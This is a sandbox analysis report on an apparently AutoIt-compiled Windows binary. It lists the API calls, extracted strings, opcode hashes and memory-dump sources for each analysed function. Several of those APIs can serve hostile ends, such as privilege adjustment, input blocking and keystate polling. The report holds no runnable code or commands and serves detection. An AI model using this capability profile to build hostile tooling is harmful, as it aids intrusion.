                                                            • Opcode ID: 4319a682b676806559ada1e1e2a537e8d5e8e6a4cd1916f84ce5e893799bb061
                                                            • Instruction ID: 97ef874db8f52981c3349268c2470a19a45f8ab1525e5947e674cb477b3f0bc4
                                                            • Opcode Fuzzy Hash: 4319a682b676806559ada1e1e2a537e8d5e8e6a4cd1916f84ce5e893799bb061
                                                            • Instruction Fuzzy Hash: 31D1D8B6B1828687DB35DF19F1847AAB7A2F788784F648135DB4E57744DA3CE841CB00
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: Find$File$CloseFirstNext
                                                            • String ID:
                                                            • API String ID: 3541575487-0
                                                            • Opcode ID: 8095db4ae0d7967ea6bb3d0986d3fec5b3e30099e78eeea076049f78ea6c2b13
                                                            • Instruction ID: 1b831256d2d054437a97fee74cdef5158fc1f41f14e8f240e04b585ccf764315
                                                            • Opcode Fuzzy Hash: 8095db4ae0d7967ea6bb3d0986d3fec5b3e30099e78eeea076049f78ea6c2b13
                                                            • Instruction Fuzzy Hash: EC515ABA608A46C6DB14EF25E0843ACB7A0FB84BD4F944232DA5D477A5CF3CD551C721
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: AdjustConcurrency::cancel_current_taskErrorLastLookupPrivilegePrivilegesTokenValue
                                                            • String ID:
                                                            • API String ID: 2278415577-0
                                                            • Opcode ID: 70c4773b18923e0c28b697d59e2b6e62826da89e857526a178f76e4b759ffcd8
                                                            • Instruction ID: 9f61d7d9d27f8733b3cfa0f3d607a6ea9d28f41c8344e48542177b7f21e1c0b2
                                                            • Opcode Fuzzy Hash: 70c4773b18923e0c28b697d59e2b6e62826da89e857526a178f76e4b759ffcd8
                                                            • Instruction Fuzzy Hash: 18219DB6A08B8685DB04AF26F5403A9B7A1FB88B94F888436DE4D07718CF78D556C711
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: AllocateCheckFreeInitializeMembershipToken
                                                            • String ID:
                                                            • API String ID: 3429775523-0
                                                            • Opcode ID: 3eb730c412da6b237fdafb429a025579d281427b312740e7d186e067821098ed
                                                            • Instruction ID: 1010c6d83a8234f5c932e2f0675712ee0ef9933fd75095aab7e244bf22f4b3df
                                                            • Opcode Fuzzy Hash: 3eb730c412da6b237fdafb429a025579d281427b312740e7d186e067821098ed
                                                            • Instruction Fuzzy Hash: 250140B76247818FE7109F20E4553AA77B0F75476FF400929E64A86A98CB7DC158CF81
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: Heap$AllocInitializeProcess
                                                            • String ID:
                                                            • API String ID: 570334035-0
                                                            • Opcode ID: c2212e710faa0aa25c6585764cd3283daba03b8e8a3efd7139333ad593dfd05c
                                                            • Instruction ID: 35a1c92744586d9bf82abe1518e8ad1815616d33cc1c865cebb09bf41d3a15f9
                                                            • Opcode Fuzzy Hash: c2212e710faa0aa25c6585764cd3283daba03b8e8a3efd7139333ad593dfd05c
                                                            • Instruction Fuzzy Hash: E5F06D36A19B5282D714DB46B00021AB7A0FB88B91B988535DF8A43B18EF3CE854CB80
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: .
                                                            • API String ID: 0-248832578
                                                            • Opcode ID: e1d1fb4f290d3f8f73012e05781d19b6c344ca2143228aded1dc3f30a5d54e4e
                                                            • Instruction ID: 2c859954e260407c856bcd85a439fe80b0b57bd868c1127c37a87f44526c80f0
                                                            • Opcode Fuzzy Hash: e1d1fb4f290d3f8f73012e05781d19b6c344ca2143228aded1dc3f30a5d54e4e
                                                            • Instruction Fuzzy Hash: 00312599B18A9144EB20AF66A8047B6F691FB50BE4FD48636EE9D07BC4DE3CD405C312
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: LocalTime
                                                            • String ID: %.3d
                                                            • API String ID: 481472006-986655627
                                                            • Opcode ID: 0a1c5bb443c020c262df8418af2e2bd068d9f57d67344cb8eb19a51fac8e6ff3
                                                            • Instruction ID: fba8839f98294cc5bcb9c3244b95f3926d7e47cc6a0d5bde4d779f2b4e2afd9d
                                                            • Opcode Fuzzy Hash: 0a1c5bb443c020c262df8418af2e2bd068d9f57d67344cb8eb19a51fac8e6ff3
                                                            • Instruction Fuzzy Hash: D7D0E2AAA1D563D1EA50EF94F8412BDE332BF40B15BC00033E50E4A4D8AF79E504E723
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: ExceptionRaise_clrfp
                                                            • String ID:
                                                            • API String ID: 15204871-0
                                                            • Opcode ID: 2c887139cc1f69395780bda7c312862f1bbc48349006177215bd8e385e5acab5
                                                            • Instruction ID: 5cef6726d6addb7ab9a6fac453aceeeaac76e27685d2f013bc46c4eadbcd9cc8
                                                            • Opcode Fuzzy Hash: 2c887139cc1f69395780bda7c312862f1bbc48349006177215bd8e385e5acab5
                                                            • Instruction Fuzzy Hash: 1EB19DB7600B848BEB15CF29D84536CBBA0F784B88F58C926DB9D837A4CB39D451C711
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: Internet$AvailableDataFileQueryRead
                                                            • String ID:
                                                            • API String ID: 599397726-0
                                                            • Opcode ID: a54c6d4a74e6411871131af3bdbcf589181ad988d0891215d2ce77e29c03cb3f
                                                            • Instruction ID: 92919b83ff94e8d83280cd973df79e5ec9bec5b691a8b8eedc480be43802bd4b
                                                            • Opcode Fuzzy Hash: a54c6d4a74e6411871131af3bdbcf589181ad988d0891215d2ce77e29c03cb3f
                                                            • Instruction Fuzzy Hash: 6F31D07AB08A0186FB18EF26E4507B8A7A1FF85B88F984436DE0D47B98DF38D451C311
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: AdjustCloseHandlePrivilegesToken
                                                            • String ID:
                                                            • API String ID: 81990902-0
                                                            • Opcode ID: 2696843c0c1c48d019296e0beaf727179f08331fefa667d0a626b5bdda81ebd6
                                                            • Instruction ID: 63398d3a5509748bcf63695da06353c89088011e3a991527a867461c559f8871
                                                            • Opcode Fuzzy Hash: 2696843c0c1c48d019296e0beaf727179f08331fefa667d0a626b5bdda81ebd6
                                                            • Instruction Fuzzy Hash: A7F065FAA18A4582EB54EB61E4153B99760FBD8F99FA40533CE0D0B658CF3CD086C261
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: a/p$am/pm
                                                            • API String ID: 0-3206640213
                                                            Strings
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID: 0$0x%p
                                                            • API String ID: 3215553584-2479247192
                                                            Strings
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Variable is not of type 'Object'.
                                                            • API String ID: 0-1840281001
                                                            Strings
                                                            Similarity
                                                            • API ID:
                                                            • String ID: no error
                                                            • API String ID: 0-1106124726
                                                            APIs
                                                            Similarity
                                                            • API ID: BlockInput
                                                            • String ID:
                                                            • API String ID: 3456056419-0
                                                            APIs
                                                            Similarity
                                                            • API ID: NameUser
                                                            • String ID:
                                                            • API String ID: 2645101109-0
                                                            Strings
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID: 0
                                                            • API String ID: 3215553584-4108050209
                                                            Strings
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID: 0
                                                            • API String ID: 3215553584-4108050209
                                                            Strings
                                                            Similarity
                                                            • API ID:
                                                            • String ID: @
                                                            • API String ID: 0-2766056989
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID:
                                                            • API String ID: 3215553584-0
                                                            APIs
                                                            Similarity
                                                            • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                            • String ID:
                                                            • API String ID: 3521893082-0
                                                            • Opcode ID: ef7366886db55824d460b1c50baab5321c9adbfaa8eab0a2c69b3322450da6b5
                                                            • Instruction ID: 463773fbc14c50b1132d5ecc9a99dc81d5f6737ed5de93528b5b5d6b5400a285
                                                            • Opcode Fuzzy Hash: ef7366886db55824d460b1c50baab5321c9adbfaa8eab0a2c69b3322450da6b5
                                                            • Instruction Fuzzy Hash: 56A1B6BAF08A1286EB14AB61E44477C6B61BF49BA5F804336DE2E17BD8DF3C9444C351
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: ErrorMode$DriveType
                                                            • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                            • API String ID: 2907320926-4222207086
                                                            • Opcode ID: 94db47e06bd0190674c94e1b1137c27149ea748c604d997c0ecd6c7b010eced7
                                                            • Instruction ID: 90c185526ae4e6d0d19721c92de71bfc226dc2a6f99547aea045c55304928511
                                                            • Opcode Fuzzy Hash: 94db47e06bd0190674c94e1b1137c27149ea748c604d997c0ecd6c7b010eced7
                                                            • Instruction Fuzzy Hash: 9CB15EE9B0CE42D0EA64BB69F5403B8A761BF50784BD85133D90E07A99DF3CE945D322
                                                            APIs
                                                            Similarity
                                                            • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                            • String ID:
                                                            • API String ID: 1996641542-0
                                                            • Opcode ID: be73899effbf77ebd9d54faa89356d5f551f326618c8bd974714f6933a768820
                                                            • Instruction ID: f2349a7596a7091d479e288924a157aa8b588ce8ef50b23cc325b85c02d63cbc
                                                            • Opcode Fuzzy Hash: be73899effbf77ebd9d54faa89356d5f551f326618c8bd974714f6933a768820
                                                            • Instruction Fuzzy Hash: C871B5BAB08A4186E724AB11F84473AB761FB89BA1F404336DD6E43B98DF3CD444C711
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                            • String ID: tooltips_class32
                                                            • API String ID: 698492251-1918224756
                                                            • Opcode ID: 134fb4e1424d2fb4e321c1dd5c8cc0f154a29b10d7bebbc83ea585521f9a7016
                                                            • Instruction ID: 1cbaa817df6c31c703e76f837e105291d6e65ab30cebc73a80aff51ec887a216
                                                            • Opcode Fuzzy Hash: 134fb4e1424d2fb4e321c1dd5c8cc0f154a29b10d7bebbc83ea585521f9a7016
                                                            • Instruction Fuzzy Hash: CEC17EBAA08B418AE718DF65E4447ADB7A0FB89B84F900036EA5E47754CF7CE841C751
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                            • String ID: @
                                                            • API String ID: 3869813825-2766056989
                                                            • Opcode ID: b82c187733dd5023c28d903207b62df0d5996a373ba8083c7f15af3311f57f4a
                                                            • Instruction ID: a7937fe378ef201300973a2cdc79e682c318b2485a467803196771f2aa94708f
                                                            • Opcode Fuzzy Hash: b82c187733dd5023c28d903207b62df0d5996a373ba8083c7f15af3311f57f4a
                                                            • Instruction Fuzzy Hash: EF818DBAA04A4286E740EF79E85076D77A1FB44B89F804532CE0EA775CDF38E845C721
                                                            APIs
                                                            Similarity
                                                            • API ID: Color$LongWindow$ModeObjectStockText
                                                            • String ID:
                                                            • API String ID: 554392163-0
                                                            • Opcode ID: 75ec6bcd28a8efb3125b08e197a7caecd4c99aa61c3caa47667afd5c8d51fa7a
                                                            • Instruction ID: 87eefe74d069ad9fef925d6ee1c594b4ca6ae61db1778768f3016f57045d9c90
                                                            • Opcode Fuzzy Hash: 75ec6bcd28a8efb3125b08e197a7caecd4c99aa61c3caa47667afd5c8d51fa7a
                                                            • Instruction Fuzzy Hash: 9881D2ADD0855381EA34AB29B44877DA391EF45761FD50233CD9E072A8DE3CA882C723
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: wcscat$FileInfoQueryValueVersion$Sizewcscpywcsstr
                                                            • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                            • API String ID: 222038402-1459072770
                                                            • Opcode ID: cd0cb460e9213e7bbd7e72b67b5e96f7d513e8dcebbe310305f3515603c5f5bf
                                                            • Instruction ID: 5584bf1633ab9b102301e2c57a377e5a4b9c7043c9b8167d8189c7242a40e49a
                                                            • Opcode Fuzzy Hash: cd0cb460e9213e7bbd7e72b67b5e96f7d513e8dcebbe310305f3515603c5f5bf
                                                            • Instruction Fuzzy Hash: 585171AAB0864246EA14FB16B5113B9A352BF85FD0FC04432DD4E4BB95EF3CE501C726
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: BuffCharMessageSendUpper
                                                            • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                            • API String ID: 3974292440-4258414348
                                                            • Opcode ID: 3f2e69d4aa51dbb406168e8eec17f7dda2e2331c7f002e480690ed7ff1453b94
                                                            • Instruction ID: 24033fbe68368ef9726db6231e1fd76b742c047240ea90324a3afb81b5d26373
                                                            • Opcode Fuzzy Hash: 3f2e69d4aa51dbb406168e8eec17f7dda2e2331c7f002e480690ed7ff1453b94
                                                            • Instruction Fuzzy Hash: B812C39FB1865382EE58BB65A8417BDE7A0AF54BD4B844533EE0D46791EE3CE401C332
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: SendString$BuffCharDriveLowerType
                                                            • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                            • API String ID: 1600147383-4113822522
                                                            • Opcode ID: c97716080e4f543c9a20482f6ee2b28a1c64bce64f7816063184408ee6a3b085
                                                            • Instruction ID: 7250426bc9c943c3c18d255ac7abedaf8f7b8cd7a95f40892861249fcd4b516e
                                                            • Opcode Fuzzy Hash: c97716080e4f543c9a20482f6ee2b28a1c64bce64f7816063184408ee6a3b085
                                                            • Instruction Fuzzy Hash: BB81BFAAB14A42C5EB00AB65E8403BCA3A1FB54B88F944433CE0D47794DF3CE956C362
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: Load$Image$IconLibraryMessageSend_invalid_parameter_noinfo$DestroyExtractFree
                                                            • String ID: .dll$.exe$.icl
                                                            • API String ID: 258715311-1154884017
                                                            • Opcode ID: e03b8a297f3e31543187ea4d980dcab107f3fc290ba37e0d0746b7471e731d00
                                                            • Instruction ID: 9ffe51f2b464b2abd6978733ef95f6159f0bb397feeb1d25b5f6a9dfba560185
                                                            • Opcode Fuzzy Hash: e03b8a297f3e31543187ea4d980dcab107f3fc290ba37e0d0746b7471e731d00
                                                            • Instruction Fuzzy Hash: 8771E7BAA0575286EB14EF21A444779A7A0FF44B95F840637DD2E47798DF3CD444C321
                                                            APIs
                                                            Similarity
                                                            • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                            • String ID:
                                                            • API String ID: 3840717409-0
                                                            • Opcode ID: 7c311c18288b1496fa214aa0c4abe44590be5c31b38ad7f7d9d564ed982c3a32
                                                            • Instruction ID: 30bddb02242bf42fc43042f5e1181f6db9419e3956f80b1719db25be45590e3c
                                                            • Opcode Fuzzy Hash: 7c311c18288b1496fa214aa0c4abe44590be5c31b38ad7f7d9d564ed982c3a32
                                                            • Instruction Fuzzy Hash: 475168BAB14B01C6EB14DF66E808B6D77A0FB88B96B904536DE2E03B08DF39D405C711
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: Variant$ClearInit
                                                            • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                            • API String ID: 2610073882-3931177956
                                                            • Opcode ID: 71cb67d8980752d71d61beca9315e30f05edd3d223294706e17d030598d61897
                                                            • Instruction ID: a063ab2cac0f4385864596f2881844a1471248501db1feddf68d206e0665a4f0
                                                            • Opcode Fuzzy Hash: 71cb67d8980752d71d61beca9315e30f05edd3d223294706e17d030598d61897
                                                            • Instruction Fuzzy Hash: 390291BAA08642C5E658BF25E15437CA3A1FF04B50F9D8937DA0E07A94DF3DE450D322
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: Filewcscat$DeleteTemp$NamePath_fread_nolock_invalid_parameter_noinfowcscpy
                                                            • String ID: aut
                                                            • API String ID: 130057722-3010740371
                                                            Similarity
                                                            • API ID: Window$MessageSend$CreateDestroy$DesktopRect
                                                            • String ID: tooltips_class32
                                                            • API String ID: 2443926738-1918224756
                                                            Similarity
                                                            • API ID: CurrentDirectoryTime$File$Localwcscat$Systemwcscpy
                                                            • String ID: *.*
                                                            • API String ID: 1111067124-438819550
                                                            Similarity
                                                            • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                            • String ID:
                                                            • API String ID: 2598888154-3916222277
                                                            Similarity
                                                            • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                            • String ID: NULL Pointer assignment
                                                            • API String ID: 2706829360-2785691316
                                                            APIs
                                                            • CharUpperBuffW.USER32(?,?,?,00000000,?,?,?,00007FF7EC1BFD7B), ref: 00007FF7EC1C1143
                                                            Similarity
                                                            • API ID: BuffCharUpper
                                                            • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                            • API String ID: 3964851224-909552448
                                                            Similarity
                                                            • API ID: CurrentDirectory$AttributesFilewcscat$wcscpy
                                                            • String ID: *.*
                                                            • API String ID: 4125642244-438819550
                                                            Similarity
                                                            • API ID: ItemMenu$Info$CheckCountRadioSleep
                                                            • String ID: P
                                                            • API String ID: 1460738036-3110715001
                                                            Similarity
                                                            • API ID: Destroy$AcceleratorKillTableTimerWindow
                                                            • String ID:
                                                            • API String ID: 1974058525-0
                                                            Similarity
                                                            • API ID: Window$ItemMoveRect$Invalidate
                                                            • String ID:
                                                            • API String ID: 3096461208-0
                                                            Similarity
                                                            • API ID: State$Async$Keyboard
                                                            • String ID:
                                                            • API String ID: 541375521-0
                                                            Similarity
                                                            • API ID: BuffCharDriveLowerTypewcscpy
                                                            • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                            • API String ID: 1561581874-1000479233
                                                            Similarity
                                                            • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout
                                                            • String ID: %s%u
                                                            • API String ID: 1412819556-679674701
                                                            Similarity
                                                            • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue
                                                            • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                            • API String ID: 3030280669-22481851
                                                            • Opcode ID: a4a03563eba47bf7a6bc45b00431da315f02e209d49ab1ef43027d618f4c2dd1
                                                            • Instruction ID: 5beb8c08898d453017c7efd88650b6510a190b11f381e8d3684f1030ca3d9305
                                                            • Opcode Fuzzy Hash: a4a03563eba47bf7a6bc45b00431da315f02e209d49ab1ef43027d618f4c2dd1
                                                            • Instruction Fuzzy Hash: CA51B8AA618A8395EB10EB64F8907EDA7A0FF94384F800033EA4D47A69DF3CD545C751
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: Window$CreateMessageObjectSend$AttributesCompatibleDeleteDestroyLayeredLongMovePixelSelectStock
                                                            • String ID: static
                                                            Similarity
                                                            • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                            • String ID:
                                                            Similarity
                                                            • API ID: State$Async$Keyboard
                                                            • String ID:
                                                            APIs
                                                              • Part of subcall function 00007FF7EC126838: CreateFileW.KERNELBASE ref: 00007FF7EC1268A2
                                                              • Part of subcall function 00007FF7EC144380: GetCurrentDirectoryW.KERNEL32(?,00007FF7EC12E817), ref: 00007FF7EC14439C
                                                              • Part of subcall function 00007FF7EC1256D4: GetFullPathNameW.KERNEL32(?,00007FF7EC1256C1,?,00007FF7EC127A0C,?,?,?,00007FF7EC12109E), ref: 00007FF7EC1256FF
                                                            • SetCurrentDirectoryW.KERNEL32 ref: 00007FF7EC12E8B0
                                                            • SetCurrentDirectoryW.KERNEL32 ref: 00007FF7EC12E9FA
                                                            Similarity
                                                            • API ID: CurrentDirectory$CreateFileFullNamePathwcscpy
                                                            • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                            Similarity
                                                            • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                            • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                            Similarity
